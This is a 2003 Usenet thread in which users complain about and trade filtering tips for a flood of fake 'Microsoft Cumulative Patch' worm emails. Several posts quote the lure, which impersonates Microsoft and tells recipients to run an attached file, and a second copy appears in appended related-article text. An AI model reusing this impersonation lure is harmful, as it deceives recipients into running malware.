> 	Only a couple, many have seen 100s of them in the past 2
> days.

More like thousands.

0
CJT
9/20/2003 4:24:47 AM
In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
 "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:

> Microsoft User
> 
> this is the latest version of security update, the
> "September 2003, Cumulative Patch" update which eliminates
> all known security vulnerabilities affecting
> MS Internet Explorer, MS Outlook and MS Outlook Express.
> Install now to protect your computer.
> This update includes the functionality of all previously released patches.
> 
> System requirements: Windows 95/98/Me/2000/NT/XP
> This update applies to:
>  - MS Internet Explorer, version 4.01 and later
>  - MS Outlook, version 8.00 and later
>  - MS Outlook Express, version 4.01 and later

So.. is this yet another Windows virus? Or just spam?

-- 
C Lund, www.notam02.no/~clund
0
clund2 (1818)
9/20/2003 8:15:10 AM
In article 
<macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net
>,
 "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:

> Can We say Virus?  I had 6 of these things in my box waiting on me today!

Only 6?  I've gotten at least 70 of them since Thursday.

> 
> In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
>  "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:
> 
> > Microsoft User
0
Blackjack
9/20/2003 8:44:13 AM
"Blackjack Joe" <netuse1@jkonton.best.vwh.net> wrote in message
news:netuse1-7A1884.01441320092003@news05.west.earthlink.net...
> In article
> <macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net
> >,
>  "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
>
> > Can We say Virus?  I had 6 of these things in my box waiting on me
today!
>
> Only 6?  I've gotten at least 70 of them since Thursday.

I had 2000 in 24 hours before I set up Outlook to trash them from the mail
server.

Jonah Falcon


0
Jonah
9/20/2003 3:44:58 PM
In article <netuse1-7A1884.01441320092003@news05.west.earthlink.net>,
Blackjack Joe <netuse1@jkonton.best.vwh.net> wrote:

> In article 
> <macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net
> >,
>  "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> 
> > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> 
> Only 6?  I've gotten at least 70 of them since Thursday.
> 
> > 
> > In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
> >  "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:
> > 
> > > Microsoft User

I get around 80 every time I open my mail app. Norton Antivirus tells
me it's a "Worm.Automat.AHB" virus and that it is deleted, but it still
keeps coming. My ISP and Apple Tech Support were no help at all (Apple
told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
know how I can get rid of this short of going nuclear?. It's driving me
crazy.
0
jfwoods (12)
9/20/2003 4:10:26 PM
CJT wrote:
> Old Salt card carrying Curmudgeon wrote:
> 
>> On 19 Sep 2003 23:26:57 GMT no one of any importance going by the
>> name of, Andrew said about, "Re: Check these security pack that
>> came from the MS",   
>> Follow-up set to comp.sys.ibm.pc.games.strategic
>>
>>
>>> I got a couple
>>
>>
>>
>>     Only a couple, many have seen 100s of them in the past 2
>> days.
> 
> 
> More like thousands.
> 

I got a couple thousand.

0
javajeff
9/20/2003 4:35:26 PM
In article <200920031210261087%jfwoods@sympatico.ca>, Julian
<jfwoods@sympatico.ca> wrote:

> I get around 80 every time I open my mail app. Norton Antivirus tells
> me it's a "Worm.Automat.AHB" virus and that it is deleted, but it still
> keeps coming. My ISP and Apple Tech Support were no help at all (Apple
> told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
> know how I can get rid of this short of going nuclear?. It's driving me
> crazy.

Apple?  What's Apple got to do with this?  This virus doesn't affect
Macs.

-- 
�There are no mistakes in love.�
- Patty Smyth
0
no6 (2828)
9/20/2003 4:43:34 PM
In article <200920031210261087%jfwoods@sympatico.ca>,
 Julian <jfwoods@sympatico.ca> wrote:

> In article <netuse1-7A1884.01441320092003@news05.west.earthlink.net>,
> Blackjack Joe <netuse1@jkonton.best.vwh.net> wrote:
> 
> > In article 
> > <macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net
> > >,
> >  "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> > 
> > > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> > 
> > Only 6?  I've gotten at least 70 of them since Thursday.
> > 
> > > 
> > > In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
> > >  "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:
> > > 
> > > > Microsoft User
> 
> I get around 80 every time I open my mail app. Norton Antivirus tells
> me it's a "Worm.Automat.AHB" virus and that it is deleted, but it still
> keeps coming. My ISP and Apple Tech Support were no help at all (Apple
> told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
> know how I can get rid of this short of going nuclear?. It's driving me
> crazy.

I, too, have received at least 2,000 of those stupid fake MS emails in 
the the past two days (whereas I used to get only about five per week). 
As someone else suggested for Mac users, get PopMonitor 
(http://www.vechtwijk.nl/dev/index.html) and use it to delete spam at 
the server level. Instead of making a filter for each sender or subject, 
just make one filter that deletes all email that contains ".exe" in the 
body of the message. Since I did that with PopMonitor three hours ago, 
none of that dumb MS stuff has gotten through. Now I need to pay the 
shareware fee so I can enter more than one email address (still getting 
a few of those spams through my main email address, which I don't use 
for Usenet).
0
nosredna (233)
9/20/2003 5:43:34 PM
In article <200920031143345920%no@spam.invalid>,
 Keeper of the Purple Twilight <no@spam.invalid> wrote:

> In article <200920031210261087%jfwoods@sympatico.ca>, Julian
> <jfwoods@sympatico.ca> wrote:
> 
> > I get around 80 every time I open my mail app. Norton Antivirus tells
> > me it's a "Worm.Automat.AHB" virus and that it is deleted, but it still
> > keeps coming. My ISP and Apple Tech Support were no help at all (Apple
> > told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
> > know how I can get rid of this short of going nuclear?. It's driving me
> > crazy.
> 
> Apple?  What's Apple got to do with this?  This virus doesn't affect
> Macs.

But the emails still come in. Even though Macs are immune, the spam is 
still a big nuisance.
0
nosredna (233)
9/20/2003 5:44:52 PM
In article <marc.heusser-317771.06115920092003@news.bluewin.ch>, Marc
Heusser <marc.heusser@CHEERSheusser.comMERCIALSPAMMERS.invalid> wrote:

> In article 
> <macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net
> >,
>  "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> 
> > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> 
> Check at www.cert.org - the standard.

Get Mail Siphon (software) - you can delete them right off the server
without ever dowloading them to an email program.
0
9/20/2003 9:21:54 PM
In article <nosredna-25767E.13445220092003@corp.supernews.com>,
 nosredna <nosredna@suscom.net> wrote:

> In article <200920031143345920%no@spam.invalid>,
>  Keeper of the Purple Twilight <no@spam.invalid> wrote:
> 
> > In article <200920031210261087%jfwoods@sympatico.ca>, Julian
> > <jfwoods@sympatico.ca> wrote:
> > 
> > > I get around 80 every time I open my mail app. Norton Antivirus tells
> > > me it's a "Worm.Automat.AHB" virus and that it is deleted, but it still
> > > keeps coming. My ISP and Apple Tech Support were no help at all (Apple
> > > told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
> > > know how I can get rid of this short of going nuclear?. It's driving me
> > > crazy.
> > 
> > Apple?  What's Apple got to do with this?  This virus doesn't affect
> > Macs.
> 
> But the emails still come in. Even though Macs are immune, the spam is 
> still a big nuisance.

I'm getting about one per minute, have been for the past few days.
0
slinberg (7)
9/21/2003 4:31:47 AM
In article <slinberg-A6353F.00314721092003@netnews.attbi.com>, Steve
Linberg <slinberg@crocker.com> wrote:

> In article <nosredna-25767E.13445220092003@corp.supernews.com>,
>  nosredna <nosredna@suscom.net> wrote:
> 
> > In article <200920031143345920%no@spam.invalid>,
> >  Keeper of the Purple Twilight <no@spam.invalid> wrote:
> > 
> > > In article <200920031210261087%jfwoods@sympatico.ca>, Julian
> > > <jfwoods@sympatico.ca> wrote:
> > > 
> > > > I get around 80 every time I open my mail app. Norton Antivirus tells
> > > > me it's a "Worm.Automat.AHB" virus and that it is deleted, but it still
> > > > keeps coming. My ISP and Apple Tech Support were no help at all (Apple
> > > > told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
> > > > know how I can get rid of this short of going nuclear?. It's driving me
> > > > crazy.
> > > 
> > > Apple?  What's Apple got to do with this?  This virus doesn't affect
> > > Macs.
> > 
> > But the emails still come in. Even though Macs are immune, the spam is 
> > still a big nuisance.
> 
> I'm getting about one per minute, have been for the past few days.

This is where munging really comes in handy.

-- 
"Boom.  Boom boom boom.  Boom boom.  BOOM.  Have a nice day."
- Susan Ivanova, B5
0
no6 (2828)
9/21/2003 4:56:41 AM
In article <200920032356422139%no@spam.invalid>,
 Keeper of the Purple Twilight <no@spam.invalid> wrote:

> In article <slinberg-A6353F.00314721092003@netnews.attbi.com>, Steve
> Linberg <slinberg@crocker.com> wrote:
> 
> > In article <nosredna-25767E.13445220092003@corp.supernews.com>,
> >  nosredna <nosredna@suscom.net> wrote:
> > 
> > > In article <200920031143345920%no@spam.invalid>,
> > >  Keeper of the Purple Twilight <no@spam.invalid> wrote:
> > > 
> > > > In article <200920031210261087%jfwoods@sympatico.ca>, Julian
> > > > <jfwoods@sympatico.ca> wrote:
> > > > 
> > > > > I get around 80 every time I open my mail app. Norton Antivirus tells
> > > > > me it's a "Worm.Automat.AHB" virus and that it is deleted, but it 
> > > > > still
> > > > > keeps coming. My ISP and Apple Tech Support were no help at all 
> > > > > (Apple
> > > > > told me to erase my HD WITHOUT backing up�can you believe it!! Anyone
> > > > > know how I can get rid of this short of going nuclear?. It's driving 
> > > > > me
> > > > > crazy.
> > > > 
> > > > Apple?  What's Apple got to do with this?  This virus doesn't affect
> > > > Macs.
> > > 
> > > But the emails still come in. Even though Macs are immune, the spam is 
> > > still a big nuisance.
> > 
> > I'm getting about one per minute, have been for the past few days.
> 
> This is where munging really comes in handy.

It's not enough.  Maybe it slows the tide a bit, but it doesn't protect 
you.  At least, it didn't protect me...

-- 
Tom "Tom" Harrington
Macaroni, Automated System Maintenance for Mac OS X.
Version 1.4:  Best cleanup yet, gets files other tools miss.
See http://www.atomicbird.com/
0
tph (2302)
9/21/2003 7:43:39 PM
In article <tph-6A3184.13433921092003@localhost>,
 Tom Harrington <tph@pcisys.no.spam.dammit.net> wrote:

> It's not enough.  Maybe it slows the tide a bit, but it doesn't protect 
> you.  At least, it didn't protect me...

Spoken as one who doesn't know how to protect themself on the 'net.

My total count remains - ZERO.

A wise man once said: Trust no one!

-- 
Enough <enough@idontcare.com>
0
enough (580)
9/21/2003 9:19:58 PM
"M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote in message
news:macintoshman.Rem0veTh|s-F3A686.21270819092003@news05.west.earthlink.net 
> Can We say Virus?  I had 6 of these things in my box waiting on me today!

Wow, 6! Lucky guy, you.

> 
> In article <3ULab.44585$BS1.19025982@news4.srv.hcvlny.cv.net>,
>  "Sylvia Kleiman" <lngkkwqsharvbn@rjiya.com> wrote:
> 
> > Microsoft User
> > 
> > this is the latest version of security update, the
> > "September 2003, Cumulative Patch" update which eliminates
> > all known security vulnerabilities affecting
> > MS Internet Explorer, MS Outlook and MS Outlook Express.
> > Install now to protect your computer.
> > This update includes the functionality of all previously released patches.
> > 
> > System requirements: Windows 95/98/Me/2000/NT/XP
> > This update applies to:
> >  - MS Internet Explorer, version 4.01 and later
> >  - MS Outlook, version 8.00 and later
> >  - MS Outlook Express, version 4.01 and later
> > 
> > Recommendation: Customers should install the patch at the earliest
> > opportunity.
> > How to install: Run attached file. Choose Yes on displayed dialog box.
> > How to use: You don't need to do anything after installing this item.
> > 
> > 
> > Microsoft Product Support Services and Knowledge Base articles can be found
> > on the Microsoft Technical Support web site.
> > http://support.microsoft.com/
> > 
> > For security-related information about Microsoft products, please visit the
> > Microsoft Security Advisor web site
> > http://www.microsoft.com/security/
> > 
> > Thank you for using Microsoft products.
> > 
> > Please do not reply to this message.
> > It was sent from an unmonitored e-mail address and we are unable to respond
> > to any replies.
> > 
> > ----------------------------------------------
> > The names of the actual companies and products mentioned herein are the
> > trademarks of their respective owners.
> > ---------------------------------------------------------------------
> > [Image]
> > ---------------------------------------------------------------------
> > [Image]
> > ---------------------------------------------------------------------


0
Folkert
9/21/2003 10:59:16 PM
In article <tph-6A3184.13433921092003@localhost>, Tom Harrington
<tph@pcisys.no.spam.dammit.net> wrote:

> > This is where munging really comes in handy.
> 
> It's not enough.  Maybe it slows the tide a bit, but it doesn't protect 
> you.  At least, it didn't protect me...

It protects me, 'cos I *completely* munge it (i.e. the address I give
is completely fake and doesn't have my real addy anywhere in it).

-- 
�There are no mistakes in love.�
- Patty Smyth
0
no6 (2828)
9/22/2003 12:13:09 AM
Guys,

When Microsoft sends out a security advisory, it NEVER, NEVER, NEVER
contains attachments, but it does contain URLs or other ID
information.  They (correctly) want you to go to their web site to
download the patch.  

Of course, if someone mounted a Denial-of-Service attack on Microsoft
and at the same time put up a phony site and munged the DNS tables,
then you could be downloading a phony patch.  

Too bad MS doesn't sign their files yet.  (Did you hear the one where
VeriSign let someone who was posting as an MS employee reset
registration information or do something else evil?  It was caught
eventually, but VeriSign was at fault for not validating the phone
request.  Big, big boo-boo.  

--W--

0
Winey
9/22/2003 2:05:30 AM
Try this,

I found it in the alt.windows98 NG: It has reduced the garbage I have been
receiving to a trickel...
Download Mailwasher 2B from here: http://www.canaan.co.il/downloads_e.phtml
Not the latest ver 4.0 from the Mailwasher site. The latest version
supposedly has a problem with the Bounce-back option that gives away your
email address...

Once you've installed Mailwasher setup a filter like so: Quoted from the
alt.windows98 NG..
Under filters set up: "not to me".  Modify with: *The 'To' Field*
*Does not contain*
 *shep@jmx.co.uk* (the e-mail address you normally use).  This will
stop most of the spam unless directed at you individually.  None of
the MS fakes have neen.

Seems to work.  It will reject honest messages where you're on the
CC list, and it's "To:" someone else.

It'll also reject messages from any Yahoogroups mailing lists and so
forth, I'd guess.

True.  If you want them, just put them on friends list.  This is kinda
like the "opt in" proposals.  I have fewer friends than spammers! ;-)






0
Art
9/22/2003 4:27:38 AM
On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:

> Can We say Virus?  I had 6 of these things in my box waiting on me today!

I wish I had only 6 of those.  Or only 600 of them.   It would have saved me a
lot of work.
0
Howard
9/22/2003 1:50:02 PM
Thank you very much for the tip......... they are killing me and My ISP
can do nothing to stop the flood.  I am downloading the application 
right now.


In article <nosredna-74992E.13433420092003@corp.supernews.com>,
 nosredna <nosredna@suscom.net> wrote:

> I, too, have received at least 2,000 of those stupid fake MS emails in 
> the the past two days (whereas I used to get only about five per week). 
> As someone else suggested for Mac users, get PopMonitor 
> (http://www.vechtwijk.nl/dev/index.html) and use it to delete spam at 
> the server level. Instead of making a filter for each sender or subject, 
> just make one filter that deletes all email that contains ".exe" in the 
> body of the message. Since I did that with PopMonitor three hours ago, 
> none of that dumb MS stuff has gotten through. Now I need to pay the 
> shareware fee so I can enter more than one email address (still getting 
> a few of those spams through my main email address, which I don't use 
> for Usenet).
0
aa5vu (2)
9/22/2003 4:27:20 PM
Howard Brazee wrote:
> On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> 
> 
>>Can We say Virus?  I had 6 of these things in my box waiting on me today!
> 
> 
> I wish I had only 6 of those.  Or only 600 of them.   It would have saved me a
> lot of work.

I'm getting about 1500 similar posts a day and I'm really frustrated 
by it.  I jumped from 10 to 1000 overnight. all with email refused or 
that "microsoft security patch" ENOUGH ALREADY.  yeesh.

-- 
----------------------------------------------------------------------------

                                 Darrell Mayeda
                                drmayeda@hawaii.rr.com

                            Knight of the ERmoron Round Table.


     NOTE:  I'm tired of all the spam in my mailbox please leave my 
last name            in the body of your reply.  Thanks

0
Darrell
9/22/2003 10:45:39 PM
"Howard Brazee" <howard@brazee.net> wrote in message news:<bkmumb$33i$1@peabody.colorado.edu>...
> On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> 
> > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> 
> I wish I had only 6 of those.  Or only 600 of them.   It would have saved me a
> lot of work.


Forgive my ignorance, but how the heck can this garbage be stopped?  I
am having my 10MB mail box filled every three hours since last week...
0
dslocum909
9/22/2003 11:20:03 PM
Julian <jfwoods@sympatico.ca> writes:
> 
> I get around 80 every time I open my mail app. Norton Antivirus
> tells me it's a "Worm.Automat.AHB" virus and that it is deleted, but
> it still keeps coming. My ISP and Apple Tech Support were no help at
> all (Apple told me to erase my HD WITHOUT backing up�can you believe
> it!! Anyone know how I can get rid of this short of going
> nuclear?. It's driving me crazy.

Find all the infected people that have your address in their address
books and erase _their_ hard drives without backing up.

-- David
0
9/23/2003 12:52:14 AM
Say all the bad stuff you like about us dumb AOL users but we are not seeing
these virus storms. 


>>>Can We say Virus?  I had 6 of these things in my box waiting on me today!
>> 
>> 
>> I wish I had only 6 of those.  Or only 600 of them.   It would have saved
>me a
>> lot of work.
>
>I'm getting about 1500 similar posts a day and I'm really frustrated 
>by it.  I jumped from 10 to 1000 overnight. all with email refused or 
>that "microsoft security patch" ENOUGH ALREADY.  yeesh.
>


0
gfretwell
9/23/2003 1:00:47 AM
Greg......

That is very true for me also.......

All I am getting are those little pesky riders (about 30 per day) and I just
zap them.  I run Stinger every now and then to make sure I didn't do something
stupid like open one.......but no major problems.

AOL Rules!!!!!!!!

CT
0
ferrousp
9/23/2003 1:12:23 AM
In article <80b5acac.0309221520.2dfb18a@posting.google.com>,
 dslocum909@earthlink.net (D. H. Slocum) wrote:

> "Howard Brazee" <howard@brazee.net> wrote in message 
> news:<bkmumb$33i$1@peabody.colorado.edu>...
> > On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> > 
> > > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> > 
> > I wish I had only 6 of those.  Or only 600 of them.   It would have saved 
> > me a
> > lot of work.
> 
> 
> Forgive my ignorance, but how the heck can this garbage be stopped?  I
> am having my 10MB mail box filled every three hours since last week...

There are really only two possibilities.  One is to use an email program 
with effective filtering.  A good one can delete any of these messages 
automatically.  But it's not good enough for everyone, especially those 
using dial-up connections.  The second possibility requires work on the 
part of your ISP to delete them for you.  You'd need to ask Earthlink 
about that.

-- 
Tom "Tom" Harrington
Macaroni, Automated System Maintenance for Mac OS X.
Version 1.4:  Best cleanup yet, gets files other tools miss.
See http://www.atomicbird.com/
0
Tom
9/23/2003 2:51:35 AM
> 
> I'm getting about 1500 similar posts a day and I'm really frustrated 
> by it.  I jumped from 10 to 1000 overnight. all with email refused or 
> that "microsoft security patch" ENOUGH ALREADY.  yeesh.
> 

Can anything be done about this garbage?  It is filling my 10MB
mailbox every 3 hours!
0
dslocum909
9/23/2003 2:57:13 AM
Gfretwell wrote:
> 
> Say all the bad stuff you like about us dumb AOL users but we are not seeing
> these virus storms.


I'm on an independant local ISP, and I'm just seeing a trickle.  What
does make it through the ISP filters never makes it to my machine - I
use PMMail 'remote control' to grab the headers and delete and
virus/spam remotely - except for the occasional specimin for my
collection.  AOL ain't the only answer,  and OS/2 thumbs it's nose at
Win32 virii.


-----= Posted via Newsfeeds.Com, Uncensored Usenet News =-----
http://www.newsfeeds.com - The #1 Newsgroup Service in the World!
-----==  Over 100,000 Newsgroups - 19 Different Servers! =-----
0
Jim
9/23/2003 4:09:54 AM
Tom Harrington wrote:
> One is to use an email program
> with effective filtering.  A good one can delete any of these
messages
> automatically.

Need not be a good one, either -- even Outlook Express can be
configured to delete these messages on the server without downloading
them.

> But it's not good enough for everyone, especially
> those using dial-up connections.

The problem is that you have to dial up every other hour for a minute
or so, else the mailbox will be full...

> The second possibility requires work on the
> part of your ISP to delete them for you.
> You'd need to ask Earthlink about that.

Many ISPs refuse to take such actions for the users because they do
not want to censor their users' inbox. Admittedly, they have a point
(would you want the postman to decide whether you're going to ever see
that letter addressed to you or not?), but in the present situation it
is a nuisance.

Helmut
--
All typos � My Knotty Fingers, Ltd. Capacity Dept.

0
Helmut
9/23/2003 4:49:17 AM
>and OS/2 thumbs it's nose at
>Win32 virii.

Ah, the PS/2 mafia speaks, How you been Jim? I figure if AOL is good enough for
Peter the Great (somebody who has forgot more about computers than most of us
will ever know) it's OK for me. 
0
gfretwell
9/23/2003 5:01:18 AM
Tom Harrington <tph@pcisys.no.spam.dammit.net> wrote:

> In article <80b5acac.0309221520.2dfb18a@posting.google.com>,

>  dslocum909@earthlink.net (D. H. Slocum) wrote:
> 
> > "Howard Brazee" <howard@brazee.net> wrote in message 
> > news:<bkmumb$33i$1@peabody.colorado.edu>...

> > > On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> > > 
> > > > Can We say Virus?  I had 6 of these things in my box waiting on me
> > > today!
> > > 
> > > I wish I had only 6 of those.  Or only 600 of them.   It would have
> > > saved me a lot of work.
> > 
> > 
> > Forgive my ignorance, but how the heck can this garbage be stopped?  I
> > am having my 10MB mail box filled every three hours since last week...
> 
> There are really only two possibilities.  One is to use an email program
> with effective filtering.  A good one can delete any of these messages
> automatically.  But it's not good enough for everyone, especially those
> using dial-up connections.  The second possibility requires work on the
> part of your ISP to delete them for you.  You'd need to ask Earthlink
> about that.

Procmail works for me.

-- 
The last temptation is the highest treason: 
To do the right thing for the wrong reason.  --T..S. Eliot

Walter
0
proto
9/23/2003 3:17:20 PM
I got about 25 each day.  Norton stops each one of course but still. 
The filter in Outlook does NOTHING.  Someone needs to stop this thing.
0
wpetraska
9/23/2003 8:21:31 PM
In article <bkoj42$htr$00$1@news.t-online.com>,
 "Helmut P. Einfalt" <hp.einfalt@t-online.de> wrote:

> > But it's not good enough for everyone, especially
> > those using dial-up connections.
> 
> The problem is that you have to dial up every other hour for a minute
> or so, else the mailbox will be full...

Not to mention the long download times.

> > The second possibility requires work on the
> > part of your ISP to delete them for you.
> > You'd need to ask Earthlink about that.
> 
> Many ISPs refuse to take such actions for the users because they do
> not want to censor their users' inbox. Admittedly, they have a point
> (would you want the postman to decide whether you're going to ever see
> that letter addressed to you or not?), but in the present situation it
> is a nuisance.

Better ISPs offer SpamAssasin as an opt-in service.  This enables 
customers to choose to activate the filter and to control what's 
filtered.  It can be very effective against this kind of problem.

-- 
Tom "Tom" Harrington
Macaroni, Automated System Maintenance for Mac OS X.
Version 1.4:  Best cleanup yet, gets files other tools miss.
See http://www.atomicbird.com/
0
Tom
9/23/2003 8:41:38 PM
Gfretwell wrote:
> 
> 
> Ah, the PS/2 mafia speaks, How you been Jim?

That's an interesting question, indeed.  The past month has been pretty
stressful, so put it mildly.  Reply privatly and I can fill you in, if
you like.  But I'll probably have a bit more time for the NG now.


> I figure if AOL is good enough for
> Peter the Great (somebody who has forgot more about computers than most of us
> will ever know) it's OK for me.


Naw, I prefer to support the locals.


-----= Posted via Newsfeeds.Com, Uncensored Usenet News =-----
http://www.newsfeeds.com - The #1 Newsgroup Service in the World!
-----==  Over 100,000 Newsgroups - 19 Different Servers! =-----
0
Jim
9/23/2003 11:46:47 PM
On 22-Sep-2003, "Helmut P. Einfalt" <hp.einfalt@t-online.de> wrote:

> Need not be a good one, either -- even Outlook Express can be
> configured to delete these messages on the server without downloading
> them.

How does this work?   I mean, doesn't OE have to read the message to determine
whether it is bad?


I have a filter looking for foreign alphabets, but it isn't sufficient anymore.
 What's the best way to stop those huge Chinese style alphabet spams from
downloading?
0
Howard
9/24/2003 3:49:27 PM
"D. H. Slocum" <dslocum909@earthlink.net> wrote in message news:80b5acac.0309221520.2dfb18a@posting.google.com...
> "Howard Brazee" <howard@brazee.net> wrote in message news:<bkmumb$33i$1@peabody.colorado.edu>...
> > On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> > 
> > > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> > 
> > I wish I had only 6 of those.  Or only 600 of them.   It would have saved me a
> > lot of work.
> 
> 
> Forgive my ignorance, but how the heck can this garbage be stopped?  I
> am having my 10MB mail box filled every three hours since last week...

Ahem, at ~7 per megabyte, 10MB only holds around 70 of these messages.
What's with the  more than 600?
0
Folkert
9/25/2003 10:32:44 PM
"Will" <wpetraska@chartermi.net> wrote in message
news:67b0db88.0309231221.7ed56de3@posting.google.com...
> I got about 25 each day.  Norton stops each one of course but still.
> The filter in Outlook does NOTHING.  Someone needs to stop this thing.

I had the same problem. I tried in vain all kinds of different Mail Message
Rules in OE . I finally found a solution. I am still getting those nasty
emails but they go directly in the "garbage". I use SpamPal to filter my
emails and I have added security@microsoft.com in its black list. So now
when I get those security email notices, SpamPal put them directly in the
Deleted Items folder of my OE. When I quit OE, all the files in my Deleted
Items get ... deleted. This may not be the best way to deal with the problem
but at least it stopped my frustration.


0
danto
9/26/2003 1:20:12 PM
"Folkert Rienstra" <see_Reply-To@myweb.nl> wrote in message news:<bkvvf2$6npul$3@ID-79662.news.uni-berlin.de>...
> "D. H. Slocum" <dslocum909@earthlink.net> wrote in message news:80b5acac.0309221520.2dfb18a@posting.google.com...
> > "Howard Brazee" <howard@brazee.net> wrote in message news:<bkmumb$33i$1@peabody.colorado.edu>...
> > > On 19-Sep-2003, "M. Prindle" <macintoshman.Rem0veTh|s@pobox.com> wrote:
> > > 
> > > > Can We say Virus?  I had 6 of these things in my box waiting on me today!
> > > 
> > > I wish I had only 6 of those.  Or only 600 of them.   It would have saved me a
> > > lot of work.
> > 
> > 
> > Forgive my ignorance, but how the heck can this garbage be stopped?  I
> > am having my 10MB mail box filled every three hours since last week...
> 
> Ahem, at ~7 per megabyte, 10MB only holds around 70 of these messages.
> What's with the  more than 600?

It is a little procedure I do whereby I dump them into the trash, then
I empty said trash...and surprise, it fills back up!
0
dslocum909
9/27/2003 7:02:39 AM
In article <Miyd/AEHdkaA092yn@yourhatvcn.bc.ca>,
 bpoulton@yourhatvcn.bc.ca (Bite Me) wrote:

>  haven't used it (don't need it) but this was recommended on another NG.
> It could be handy, especially for those on Dial-up.
> 
> www.email-remover.com/

Too bad the email remover is a PC only application. Sounds like 
something many of us could use.
0
noemail11 (52)
9/29/2003 12:27:36 PM
Reply:

Similar Artilces:

Mac Security: Proposal of Mac Security eGroup
Hi Mac Security readers! This message is in two sections: - First is a proposal to start a Mac Security dedicated eGroup. - Second is a thank you, and a sorry, with an brief explanation of why I write this weekly post. ----------------- -> Part 1: Mac Security eGroup One of my readers asked if I could start a listserv dedicated to Macintosh security. My own Internet server is dedicated to providing FTP services to about 900 clients. So that's out of the question. However, I am a veteran at administering eGroups. I currently run a rare music group at Yahoo, and would be glad to run another group there for those interested in news and discussion of Macintosh security. The eGroup would be kept open to anyone who wanted to join. All members will be encouraged to post Mac Security information. I will post my weekly summary reports to the eGroup as well as to the current newsgroups. Members will be welcome to comment on any Mac security related issues. Spammers, flamers and trolls will be banned at my personal discretion as well as by request from the membership. I am not sure what the 'interest density' (as I call it) will be regarding such a group. Therefore, I am soliciting feedback here in this thread, both pro and con. All useful thoughts will be appreciated. ----------------- -> Part 2: Thanks, sorry, and why I write 'Mac Security' Thank you for the appreciation I have been receiving! Encouragement is inspiring. And, &...

Is MS Word 2004 for Mac faster than MS Word X for Mac?
http://www.barefeats.com/quick.html#msw Only 3 tests but still pretty bad when it takes over twice as long to scroll through a document. Didn't panther make it faster to scroll through PDFs? In article <BigDogLinux-5743E1.22075522052004@netnews.comcast.net>, bigdaddy <BigDogLinux@comcast.net> wrote: > http://www.barefeats.com/quick.html#msw > > Only 3 tests but still pretty bad when it takes over twice as long to > scroll through a document. Didn't panther make it faster to scroll > through PDFs? Never labour under the misapprehension that Microsoft has any particular interest in making *good* software for the Mac. -- Alan Baker Vancouver, British Columbia "If you raise the ceiling 4 feet, move the fireplace from that wall to that wall, you'll still only get the full stereophonic effect if you sit in the bottom of that cupboard." bigdaddy wrote: > http://www.barefeats.com/quick.html#msw > > Only 3 tests but still pretty bad when it takes over twice as long to > scroll through a document. Didn't panther make it faster to scroll > through PDFs? No problem at all with Word 2003. Oh wait a minute. I am using the worlds best OS-Win XP. Alan Baker wrote: > In article <BigDogLinux-5743E1.22075522052004@netnews.comcast.net>, > bigdaddy <BigDogLinux@comcast.net> wrote: > > >>http://www.barefeats.com/quick.html#msw >> >>Only 3 tests but still pretty bad...

Check out these security package from the MS Corp.
--evswmvaqyddcdmhot Content-Type: multipart/related; boundary="zwooekot"; type="multipart/alternative" --zwooekot Content-Type: multipart/alternative; boundary="eptzjzfdgoyf" --eptzjzfdgoyf Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Partner this is the latest version of security update, the "October 2003, Cumulative Patch" update which resolves all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to help maintain the security of your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your system. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft...

com.ms.security, com.ms.security.PermissionID.FILEIO and error in compiling
